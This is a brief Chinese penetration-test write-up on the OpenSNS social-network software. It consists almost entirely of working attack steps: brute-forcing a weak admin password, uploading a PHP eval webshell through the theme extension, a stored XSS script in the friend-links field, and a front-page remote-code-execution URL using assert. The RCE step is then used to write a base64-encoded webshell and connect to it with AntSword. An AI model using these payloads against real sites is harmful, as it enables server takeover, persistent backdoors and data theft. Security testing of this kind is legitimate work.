Open sns网站测试结果
1、信息收集
网站账号:admin 密码:123123
2、存在的漏洞
2.1 弱口令漏洞
抓包爆破
网站账号:admin 密码:123123
成功登陆
2.2 文件上传漏洞
上传点:后台主题扩展处
一语句话木马
<?php eval($_REQUEST[666]);?>
然后回到前台页面访问这个文件(这个目录可以用kali的目录扫描出来)
访问路径
http://xxx.com/Theme/你上传的文件名
连接蚁剑成功
2.3存储型xss漏洞
在友情链接处
编辑
"><script>alert(1)</script>
成功弹窗
2.4前台RCE漏洞
打开网站首页
输入poc
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
然后改变cmd命令
输入
file_put_contents("./aaa.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="))
去访问生成的aaa.php
连接蚁剑成功